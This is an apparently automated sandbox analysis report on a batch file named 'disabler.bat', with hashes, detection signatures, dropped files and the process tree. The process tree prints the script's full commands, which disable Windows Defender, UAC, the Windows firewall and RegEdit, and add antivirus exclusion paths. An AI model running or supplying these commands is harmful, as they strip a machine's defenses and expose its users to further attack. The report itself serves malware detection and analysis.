Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08/01/2025, 05:12

General

  • Target

    disabler.bat

  • Size

    2KB

  • MD5

    c6aff26267067b25326560e96a81513f

  • SHA1

    e45b8c290c2e9cf625ce255f6d31dda440e3d61e

  • SHA256

    c7852d05266d27e604e7f988ef728a2d50edf1da816d5963ed93d643831a3e79

  • SHA512

    d909cfdc454cefb0d26ae72311c27908749c4fa52b4eb2fdf893b30e5d22b024df6e7c8bf2a519877a4995b479e0176730fe5963992057c973a3e9f0569eb441

Malware Config

Signatures

  • UAC bypass (3 TTPs, 1 IoC)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 8 IoCs)

    Using powershell.exe command.

  • Disables RegEdit via registry modification (1 IoC)
  • Modifies Windows Firewall (2 TTPs, 1 IoC)
  • Event Triggered Execution: Netsh Helper DLL (1 TTP, 3 IoCs)

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses (16 IoCs)
  • Suspicious use of AdjustPrivilegeToken (8 IoCs)
  • Suspicious use of WriteProcessMemory (36 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\disabler.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2628
    • C:\Windows\system32\net.exe
      net session
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3080
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 session
        3⤵
        PID:488
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      PID:3968
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdBoot /t REG_DWORD /d 1 /f
      2⤵
      PID:4044
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdFilter /t REG_DWORD /d 1 /f
      2⤵
      PID:4820
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisDrv /t REG_DWORD /d 1 /f
      2⤵
      PID:2892
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WdNisSvc /t REG_DWORD /d 1 /f
      2⤵
      PID:60
    • C:\Windows\system32\reg.exe
      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v WinDefend /t REG_DWORD /d 1 /f
      2⤵
      PID:2276
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'EnableLUA' -Value 0"
      2⤵
      • UAC bypass
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2944
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Add-MpPreference -ExclusionPath 'C:\ruta_a_excluir1' -ExclusionPath 'C:\ruta_a_excluir2'"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:436
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -PUAProtection Disabled"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2088
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -HighThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2056
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -ModerateThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4052
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -LowThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4844
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -SevereThreatDefaultAction 6"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4148
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Set-MpPreference -ScanScheduleDay 8"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2436
    • C:\Windows\system32\netsh.exe
      netsh advfirewall set allprofiles state off
      2⤵
      • Modifies Windows Firewall
      • Event Triggered Execution: Netsh Helper DLL
      PID:3256
    • C:\Windows\system32\reg.exe
      reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d "1" /f
      2⤵
      • Disables RegEdit via registry modification
      PID:2964

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize: 2KB
    MD5: 6cf293cb4d80be23433eecf74ddb5503
    SHA1: 24fe4752df102c2ef492954d6b046cb5512ad408
    SHA256: b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
    SHA512: 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 1KB
    MD5: 190cc2feb6fbf6a6143f296ebe043de5
    SHA1: 8fa72a99c46ed77b602476c85ca2d8ea251b22fb
    SHA256: 4faea0a40060d02a3ea3ab01102ae3f964c3316146871b6877d845d7e5408206
    SHA512: 94fc8e7d7fdc8fbc6f0b3c0c440b65c6074c22d6f0f328457988764645be763723e17e6c31bbd518cae5953297ec52de09f75c654275d54a8bd5e933ee0cc616

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 6d42b6da621e8df5674e26b799c8e2aa
    SHA1: ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
    SHA256: 5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
    SHA512: 53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 944B
    MD5: 7becdab2ad9e7d9ddc64007adfe686c2
    SHA1: fef71543e091354d4de3a9f7bee4ccb0ee42af4f
    SHA256: 783470403ea42fc708f0f80a3fa5c88be41dcd378fa0d75446d39beb3275e662
    SHA512: 1525f9b28f5b76851e50ac904a442f6a1f6f266efabb5b9e1a69049c62ba10fe2d6976cbe9f09a1811fa737838a12665f77e860f569eba317b8344b26d318a44

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: 929c856a9f5f4fd187b9b324e39be583
    SHA1: b5d74d5b632f2b0d892c0b763f7f9c36f8677fec
    SHA256: 67fc49d5d72ee25add82821193e326f1109d7b88189560492686a8f9d8b6c97e
    SHA512: 5746885b047af646bee26dc965c2fea100c395b2cc89a868af5d5858dd273497c3ea2f567c11439a84502cceea001a661352b8d0873c2cf09b1697c583fc61dd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: 3a1e249212d4af8ee7f335a5dfd075ba
    SHA1: 8ab2019e5d1376124bd79b822b9b1d4a794de076
    SHA256: 046de684b024a7e2bcb771c259e58a1a3e7f2a920579290747bec845dcd419fa
    SHA512: 8a463062e497760c41159b71480d1562e959969051e88d09be4f0ee9bed64805090021c1bb82c6eafba310cf471dc8879418fe512078d6e26c9a88575c78223b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize: 948B
    MD5: bd19bc9cb94a09e301fed47789e3e465
    SHA1: 999814ece758478a6912e0cf61eccb2135606931
    SHA256: 3eea57e35145bce1c62f119586b5cd7e8a0c140fb1ca5ee40db5784edeba7c1a
    SHA512: ad3bdde4ddbf94e136207900965c0c631b338895066205dff83ec2205f2ec11879b1e64ea67fe1e8145238d402177328cb8115494a0dce9400fc076836f29fcb

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cwmipase.xru.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/2944-12-0x00007FFB07750000-0x00007FFB08211000-memory.dmp
    Filesize: 10.8MB

  • memory/2944-15-0x00007FFB07750000-0x00007FFB08211000-memory.dmp
    Filesize: 10.8MB

  • memory/2944-11-0x00007FFB07750000-0x00007FFB08211000-memory.dmp
    Filesize: 10.8MB

  • memory/2944-1-0x000001C17F630000-0x000001C17F652000-memory.dmp
    Filesize: 136KB

  • memory/2944-0-0x00007FFB07753000-0x00007FFB07755000-memory.dmp
    Filesize: 8KB